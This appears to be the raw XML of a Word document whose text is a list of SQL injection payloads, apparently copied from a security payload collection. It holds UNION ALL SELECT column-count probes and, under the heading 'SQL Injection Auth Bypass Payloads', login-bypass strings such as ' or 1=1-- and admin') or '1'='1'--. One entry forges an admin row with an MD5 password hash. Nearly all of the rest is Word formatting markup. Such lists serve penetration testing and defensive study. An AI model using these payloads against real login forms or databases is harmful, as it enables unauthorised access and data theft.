    <w:p w14:paraId="72E1E3F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF357D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387EB11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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5CD09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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BA254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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E346C6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2FAF4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C649E1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B11F46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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADB078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UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBC077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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B77B9D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'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2099B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'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB5AE9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'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F797D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'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4588194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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113E5EE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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CCBBC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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694BDF8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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECA7CD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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5924B65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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7074578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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4F0F7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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06121DD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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000F2BA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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610B67A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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D939F4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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735122D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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB305C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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F14B1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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DA296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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3373979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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748BF5D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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38622AF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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2917300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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799B594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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BC207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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6735D62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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1764C7F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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1057507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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B72FB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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAD44D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'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28368DA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'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE5F33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'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B03A2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'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB35F3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E59205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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3A958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 xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E863EE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F289B0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D05DB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA73CB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D059F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0919639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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0EEE3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD5F46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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640DB1E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6F351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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5153F64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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1C4D6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D1233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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F407F1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5858A99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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6DDE1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEDFDF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E34858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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF3910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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E10164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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A33A65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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A813DC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xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2CFEBE" w14:textId="77777777" w:rsidR="00B51AE2" w:rsidRPr="00B51AE2" w:rsidRDefault="00B51AE2" w:rsidP="00B51AE2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="360" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL Injection Auth Bypass Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0835C95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1279F47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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA31A6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'&amp;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3866E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6DCFF65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5E2A6CC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9AF96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 '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005F0E0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''&amp;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AB11E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DB2E4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8A393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3AC20FB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E2527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"&amp;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2282C81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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4410C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644448A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA42ED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 "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A6F2A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""&amp;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB8FCF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CD5E0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329D2BA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true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529F875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true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D181C3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true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FFAE1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true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC5A99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true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49075FB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'x'='x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEFDE3A"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('x')=('x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2D1C6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(('x'))=(('x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A68FC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"x"="x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E5A2C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("x")=("x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A2609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 or (("x"))=(("x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146078D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1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5407BC6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1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D4548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1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BC6C7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or 1=1/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529A7A8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5C8B8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786284A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7686D73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2DFC8619"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4BB12A7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66B64E8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7AF049B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admin'or 1=1 or ''='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F48F12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5C58792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492C9D1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4F945A7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095F8DE1"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31D2B3E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7B4B689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16F98A3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7E37E33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4114147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lastRenderedPageBreak/>
        <w:t>admin') or '1'='1'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A61D34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55F4020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0CFF4E5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1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396E34FB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F349F0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3768645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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADE238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7705447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2021387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35800AF7"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0C31887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admin"or 1=1 or ""="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634DE65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3E89B97F"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449E119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7F154FCD"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6FA36108"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69CE6FF5"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2FA9F42E"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26094AF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4D8D15A2"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3883BB06"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30AAA07C"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1CDB7D94"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51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>admin") or "1"="1"/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6D6A03" w14:textId="77777777" w:rsidR="00B51AE2" w:rsidRPr="00B51AE2" w:rsidRDefault="00B51AE2" w:rsidP="00B51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51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4604ECB4" w14:textId="77777777" w:rsidR="00B51AE2" w:rsidRDefault="00B51AE2">
      <w:bookmarkStart w:id="27" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:sectPr w:rsidR="00B51AE2" w:rsidSect="00B51AE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5BCB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9E96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11B22"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="50DC5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A69D6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1DF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93BB5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C212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A65EA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0CE4E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C73F89"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4C0E2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27D1F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C574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0195E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B546F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27454"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="07E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87DB2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C144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E776E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="052C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47BDF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FA6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511D9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AA22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43A78"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B43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02C02"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="160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3535E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FF5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005B1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2612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32E5C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5390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53E18"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BA0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226C2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2D8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46A0D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A8B0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E3375"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8368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47E22"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="640A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64BB1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="12AC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03D42"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="813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91382"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="512C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E670E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="878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259DC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="237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45C8B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0D5C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23751"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B29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04B9D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3C10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6743B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A930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D84623"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00C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17F31"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="83E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37695"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="280C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F2802"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3540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9783C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E43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66962"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="39A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D2887"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="01C4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BB2C7A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0D8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FA2823"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="27C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10E40"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B55E89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F437EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F5B0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6"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="39"/>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93"/>
    <w:rsid w:val="007B3493"/>
    <w:rsid w:val="00B51AE2"/>
    <w:rsid w:val="00CC3B92"/>
    <w:rsid w:val="00E2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DDB4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{006F5776-9AD2-4E16-8373-32318DE0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C3B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3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1A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B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3B92"/>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CC3B92"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00CC3B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C3B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B92"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s">
    <w:name w:val="pl-s"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CC3B92"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-pds">
    <w:name w:val="pl-pds"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CC3B92"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c1">
    <w:name w:val="pl-c1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CC3B92"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-k">
    <w:name w:val="pl-k"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CC3B92"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c">
    <w:name w:val="pl-c"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CC3B92"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CC3B92"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CC3B92"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s1">
    <w:name w:val="pl-s1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CC3B92"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-smi">
    <w:name w:val="pl-smi"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CC3B92"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CC3B9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51AE2"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList2">
    <w:name w:val="No List2"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B51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26200">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="438961435">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1027220663">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="234782502">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1956792466">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="667363103">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1548375668">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="991787075">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1453089331">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1513303515">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1066605204">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="632947649">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
